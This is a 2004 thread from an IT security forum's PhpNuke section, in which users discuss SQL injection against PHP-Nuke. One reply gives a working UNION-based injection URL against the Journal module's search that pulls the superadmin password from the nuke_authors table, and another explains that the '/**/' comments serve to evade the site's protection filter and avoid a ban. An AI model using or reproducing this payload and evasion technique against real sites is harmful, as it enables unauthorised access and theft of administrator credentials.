|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 138
Members: 0
Total: 138
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
aproblem with /**/ |
|
Posted: Sun Jul 11, 2004 5:09 am |
|
|
thotho |
Beginner |
|
|
Joined: Jun 14, 2004 |
Posts: 4 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Sun Jul 11, 2004 2:09 pm |
|
|
madman |
Active user |
|
|
Joined: May 24, 2004 |
Posts: 46 |
|
|
|
|
|
|
|
What SQL injection?
All I saw was normal query. |
|
_________________ ch88rs,
madman |
|
|
|
Posted: Sun Jul 11, 2004 8:57 pm |
|
|
SteX |
Advanced user |
|
|
Joined: May 18, 2004 |
Posts: 181 |
Location: Serbia |
|
|
|
|
|
|
try:
Code: | modules.php?name=Journal&file=search&bywhat=aid&exact=1
&forwhat=kala'/**/UNION/**/SELECT/**/0,0,pwd,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/
WHERE/**/radminsuper=1/**/LIMIT/**/1/* |
but this only works for servers with enabled UNION..!! |
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
Posted: Mon Jul 12, 2004 2:56 am |
|
|
thotho |
Beginner |
|
|
Joined: Jun 14, 2004 |
Posts: 4 |
|
|
|
|
|
|
|
SteX
mysql is 4.1
iwant to no who to do a SQL injection command without /**/
the link should not have /**/ in it or it will redirect me to the index.php page
cheers |
|
|
|
|
Posted: Mon Jul 19, 2004 9:52 am |
|
|
migo79 |
Regular user |
|
|
Joined: May 18, 2004 |
Posts: 17 |
|
|
|
|
|
|
|
/**/ is essential to evade the protector system because if use normal injection the protector will ban u.
and also it will not affect the query because as u can see it's jst a comment so it will be ignored by mysql |
|
|
|
|
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|